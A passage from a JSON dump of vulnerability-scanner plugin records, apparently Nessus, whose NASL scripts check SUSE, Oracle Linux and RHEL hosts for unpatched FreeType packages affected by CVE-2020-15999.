script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreetype6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreetype6-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreetype6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"freetype2-debugsource-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"freetype2-devel-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libfreetype6-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libfreetype6-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"freetype2-debugsource-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"freetype2-devel-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libfreetype6-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libfreetype6-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"freetype2-debugsource-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"freetype2-devel-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"ftdump-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libfreetype6-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libfreetype6-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"freetype2-debugsource-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"freetype2-devel-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libfreetype6-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libfreetype6-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", cpu:\"x86_64\", reference:\"libfreetype6-32bit-debuginfo-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"freetype2-debugsource-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"freetype2-devel-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"ftdump-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libfreetype6-2.10.1-4.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libfreetype6-debuginfo-2.10.1-4.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:42:12", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2020-4907 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : freetype (ELSA-2020-4907)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:freetype", "p-cpe:/a:oracle:linux:freetype-demos", "p-cpe:/a:oracle:linux:freetype-devel"], "id": "ORACLELINUX_ELSA-2020-4907.NASL", "href": "https://www.tenable.com/plugins/nessus/142482", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2020-4907.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142482);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Oracle Linux 7 : freetype (ELSA-2020-4907)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2020-4907 advisory.\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2020-4907.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype, freetype-demos and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freetype-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'aarch64', 'release':'7'},\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'i686', 'release':'7'},\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'x86_64', 'release':'7'},\n {'reference':'freetype-demos-2.8-14.el7_9.1', 'cpu':'aarch64', 'release':'7'},\n {'reference':'freetype-demos-2.8-14.el7_9.1', 'cpu':'x86_64', 'release':'7'},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'aarch64', 'release':'7'},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'i686', 'release':'7'},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'x86_64', 'release':'7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-demos / freetype-devel');\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:42:09", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4952 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "RHEL 8 : freetype (RHSA-2020:4952)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:rhel_aus:8.4", "cpe:/o:redhat:rhel_e4s:8.4", "cpe:/o:redhat:rhel_eus:8.4", "cpe:/o:redhat:rhel_tus:8.4", "p-cpe:/a:redhat:enterprise_linux:freetype", "p-cpe:/a:redhat:enterprise_linux:freetype-devel"], "id": "REDHAT-RHSA-2020-4952.NASL", "href": "https://www.tenable.com/plugins/nessus/142480", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4952. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142480);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4952\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 8 : freetype (RHSA-2020:4952)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4952 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4952\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'enterprise_linux_8_appstream': [\n 'rhel-8-for-aarch64-appstream-debug-rpms',\n 'rhel-8-for-aarch64-appstream-rpms',\n 'rhel-8-for-aarch64-appstream-source-rpms',\n 'rhel-8-for-s390x-appstream-debug-rpms',\n 'rhel-8-for-s390x-appstream-rpms',\n 'rhel-8-for-s390x-appstream-source-rpms',\n 'rhel-8-for-x86_64-appstream-debug-rpms',\n 'rhel-8-for-x86_64-appstream-rpms',\n 'rhel-8-for-x86_64-appstream-source-rpms'\n ],\n 'enterprise_linux_8_baseos': [\n 'rhel-8-for-aarch64-baseos-debug-rpms',\n 'rhel-8-for-aarch64-baseos-rpms',\n 'rhel-8-for-aarch64-baseos-source-rpms',\n 'rhel-8-for-s390x-baseos-debug-rpms',\n 'rhel-8-for-s390x-baseos-rpms',\n 'rhel-8-for-s390x-baseos-source-rpms',\n 'rhel-8-for-x86_64-baseos-debug-rpms',\n 'rhel-8-for-x86_64-baseos-rpms',\n 'rhel-8-for-x86_64-baseos-source-rpms'\n ],\n 'enterprise_linux_8_crb': [\n 'codeready-builder-for-rhel-8-aarch64-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-aarch64-rpms',\n 'codeready-builder-for-rhel-8-aarch64-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-rpms',\n 'codeready-builder-for-rhel-8-s390x-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-rpms',\n 'codeready-builder-for-rhel-8-x86_64-source-rpms'\n ],\n 'enterprise_linux_8_highavailability': [\n 'rhel-8-for-aarch64-highavailability-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms',\n 'rhel-8-for-aarch64-highavailability-rpms',\n 'rhel-8-for-aarch64-highavailability-source-rpms',\n 'rhel-8-for-s390x-highavailability-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-rpms',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms',\n 'rhel-8-for-s390x-highavailability-rpms',\n 'rhel-8-for-s390x-highavailability-source-rpms',\n 'rhel-8-for-x86_64-highavailability-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-rpms',\n 'rhel-8-for-x86_64-highavailability-source-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms'\n ],\n 'enterprise_linux_8_nfv': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-nfv-tus-debug-rpms',\n 'rhel-8-for-x86_64-nfv-tus-rpms',\n 'rhel-8-for-x86_64-nfv-tus-source-rpms'\n ],\n 'enterprise_linux_8_realtime': [\n 'rhel-8-for-x86_64-rt-debug-rpms',\n 'rhel-8-for-x86_64-rt-rpms',\n 'rhel-8-for-x86_64-rt-source-rpms',\n 'rhel-8-for-x86_64-rt-tus-debug-rpms',\n 'rhel-8-for-x86_64-rt-tus-rpms',\n 'rhel-8-for-x86_64-rt-tus-source-rpms'\n ],\n 'enterprise_linux_8_resilientstorage': [\n 'rhel-8-for-s390x-resilientstorage-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms',\n 'rhel-8-for-s390x-resilientstorage-rpms',\n 'rhel-8-for-s390x-resilientstorage-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-rpms',\n 'rhel-8-for-x86_64-resilientstorage-source-rpms'\n ],\n 'enterprise_linux_8_sap': [\n 'rhel-8-for-s390x-sap-netweaver-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-s390x-sap-netweaver-rpms',\n 'rhel-8-for-s390x-sap-netweaver-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-source-rpms'\n ],\n 'enterprise_linux_8_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-rpms',\n 'rhel-8-for-x86_64-sap-solutions-source-rpms'\n ],\n 'enterprise_linux_8_supplementary': [\n 'rhel-8-for-aarch64-supplementary-eus-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms',\n 'rhel-8-for-aarch64-supplementary-rpms',\n 'rhel-8-for-aarch64-supplementary-source-rpms',\n 'rhel-8-for-s390x-supplementary-eus-rpms',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms',\n 'rhel-8-for-s390x-supplementary-rpms',\n 'rhel-8-for-s390x-supplementary-source-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms',\n 'rhel-8-for-x86_64-supplementary-rpms',\n 'rhel-8-for-x86_64-supplementary-source-rpms'\n ],\n 'rhel_aus_8_4_appstream': [\n 'rhel-8-for-x86_64-appstream-aus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-aus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-aus-rpms',\n 'rhel-8-for-x86_64-appstream-aus-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-appstream-aus-source-rpms',\n 'rhel-8-for-x86_64-appstream-aus-source-rpms__8_DOT_4'\n ],\n 'rhel_aus_8_4_baseos': [\n 'rhel-8-for-x86_64-baseos-aus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-aus-debug-rpms__8_DOT_4',\n 'rhel-8-for-x86_64-baseos-aus-rpms',\n 